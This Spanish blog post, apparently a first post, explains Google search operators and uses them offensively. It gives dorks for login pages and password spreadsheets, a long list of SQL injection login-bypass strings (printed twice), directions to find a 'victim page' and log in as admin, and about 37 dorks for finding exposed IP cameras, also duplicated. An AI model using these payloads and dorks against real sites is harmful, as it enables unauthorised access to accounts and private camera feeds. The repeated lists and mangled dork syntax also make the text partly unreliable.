GOOGLE HACKING
Hola lectores en este artículo hablaremos
sobre google hacking un tema muy conocido comencemos :
En una manera muy simple google hacking es un
método de búsqueda donde se utiliza comando o operadores con los cuales podemos hacer que se filtre
información y con ello tener una mejor búsqueda obtenemos resultados mas
sensibles .
ALGUNOS OPERADORES:
+: Realiza
búsquedas que contenga los dos términos buscados
-:
realizamos una búsqueda y incluimos la palabra que no queremos que se relacione
OR (I): Realiza búsquedas que contenga uno de los dos
términos buscados
AND: Hace búsquedas
que contenga dos resultados
COMANDOS
inurl
inurl:login.asp
Busca el directorio compuesto de login.asp que
se encuentre como parte de la URL. Además podemos intercambiar las búsquedas y
en vez de login.asp podemos poner algo como: admin .asp, password,
administador.asp, etc...
filetype
Es un operador que nos permite hacer búsqueda
de ficheros con extensiones específicos. Por ejemplo en el ejemplo le estamos
diciendo que busque archivos de Excel (.xls) que hagan referencia a la palabra
“contraseñas”.
filetype.xls "contraseña"
link
Este operador muestra todos los sitios web que
en sus paginas tengan links que apunten la url www.presidencia.gob.pe, con esto
investigamos que tipo de relación tiene con otras empresas y mas información acerca
e esta
author
author: TheAprendo4567
Esto hara una búsqueda en google por todos
sitios, foros, blogs, en la cual haya comentado e iniciado un tema el usuario:
TheAprendo4567
site :
site busca dentro de la pagina seleccionada la palabra
o el literal que mencionamos entre comillas
Google Hacking + sql Injection
' or
'1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
================================================
and 1=1--
and 1=1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
================================================
and 1=1--
and 1=1
Esto ya aparece en varios videos es solo una recopilación
Primero utilizamos google hacking para buscar la pagina victima
Esta es la pagina victima usuario: admin contraseña: cualquiera de las especificadas anteriormente
Sql inject es un método muy antiguo
¿como sabemos si una pagina es vulnerable a sql inject
?
Para saber si una pagina es vulnerable a sql inject
generalmente se le añade ‘ a su url que puede ser .cat.php?id=15 le añado ‘ al
número 15 asi se si es vulnerable hay otras maneras que seguro tocaremos en
otro post.
GOOGLE HACKING + IP CAMERA
Generalmente en todo tipo de establecimiento o a algún
lugar en que vamos podemos ver una cámara esa cámara puede que no sea segura y
que cualquier persona con internet pueda conectarse a esa cámara .
La localización de cámaras ip mediante google hacking
es un proceso sumamente fácil
Ahora los comandos para acceder a algunas cámaras ip ,
cabe resaltar que algunas cámaras ip son publicas .
inurl:/view.shtml
intitle:“Live
View/-AXIS 210
Otros comandos que podemos encontrar en la web
inurl: "ViewerFrame Mode =
2. intitle: Axis 2400 servidor de vídeo
3. inurl: /view.shtml
4. intitle: "Live View / - AXIS" | inurl: view / view.shtml ^
5. inurl: ViewerFrame Mode =
6. inurl: ViewerFrame Mode = Refresh
7. inurl: axis-cgi / jpg
8. inurl: axis-cgi / mjpg (motion-JPEG)
9. inurl: view / indexFrame.shtml
10. inurl: view / index.shtml
11. inurl: view / view.shtml
12. LiveApplet
13. intitle: "visualización en vivo" intitle: eje
14. intitle: LiveApplet
15. allintitle: "La cámara de red NetworkCamera"
16. intitle: axis intitle: "video server"
17. intitle: liveapplet inurl: LvAppl
18. intitle: "EvoCam" inurl: "webcam.html"
19. intitle: "Live alimentación NetSnap Cam-Server"
20. intitle: "Live View / - AXIS"
21. intitle: "Live View / - AXIS 206M"
22. intitle: "Live View / - AXIS 206W"
23. intitle: "Live View / - AXIS 210"
24. inurl: indexFrame.shtml Axis
25. inurl: "? MultiCameraFrame Mode = Motion"
26. intitle: start inurl: cgistart
27. intitle: "WJ-NT104 Página Principal"
28. intext: "MOBOTIX M1" intext: "Abrir menú"
29. intext: "MOBOTIX M10" intext: "Abrir menú"
30. intext: "MOBOTIX D10" intext: "Abrir menú"
31. intitle: snc-z20 inurl: home /
32. intitle: snc-cs3 inurl: home /
33. intitle: snc-RZ30 inurl: inicio /
34. intitle: "sony cámara de red SNC-P1"
35. intitle: "sony network camera snc-m1"
36. El sitio: .viewnetcam.com -www.viewnetcam.com
37. intitle: "Cámara Toshiba red" de inicio de sesión de usuario
2. intitle: Axis 2400 servidor de vídeo
3. inurl: /view.shtml
4. intitle: "Live View / - AXIS" | inurl: view / view.shtml ^
5. inurl: ViewerFrame Mode =
6. inurl: ViewerFrame Mode = Refresh
7. inurl: axis-cgi / jpg
8. inurl: axis-cgi / mjpg (motion-JPEG)
9. inurl: view / indexFrame.shtml
10. inurl: view / index.shtml
11. inurl: view / view.shtml
12. LiveApplet
13. intitle: "visualización en vivo" intitle: eje
14. intitle: LiveApplet
15. allintitle: "La cámara de red NetworkCamera"
16. intitle: axis intitle: "video server"
17. intitle: liveapplet inurl: LvAppl
18. intitle: "EvoCam" inurl: "webcam.html"
19. intitle: "Live alimentación NetSnap Cam-Server"
20. intitle: "Live View / - AXIS"
21. intitle: "Live View / - AXIS 206M"
22. intitle: "Live View / - AXIS 206W"
23. intitle: "Live View / - AXIS 210"
24. inurl: indexFrame.shtml Axis
25. inurl: "? MultiCameraFrame Mode = Motion"
26. intitle: start inurl: cgistart
27. intitle: "WJ-NT104 Página Principal"
28. intext: "MOBOTIX M1" intext: "Abrir menú"
29. intext: "MOBOTIX M10" intext: "Abrir menú"
30. intext: "MOBOTIX D10" intext: "Abrir menú"
31. intitle: snc-z20 inurl: home /
32. intitle: snc-cs3 inurl: home /
33. intitle: snc-RZ30 inurl: inicio /
34. intitle: "sony cámara de red SNC-P1"
35. intitle: "sony network camera snc-m1"
36. El sitio: .viewnetcam.com -www.viewnetcam.com
37. intitle: "Cámara Toshiba red" de inicio de sesión de usuario
Este es mi primer Post espero que les guste si tienen sugerencias o dudas dejenlas en el comentario
Att:Fernando Velasquez
No hay comentarios:
Publicar un comentario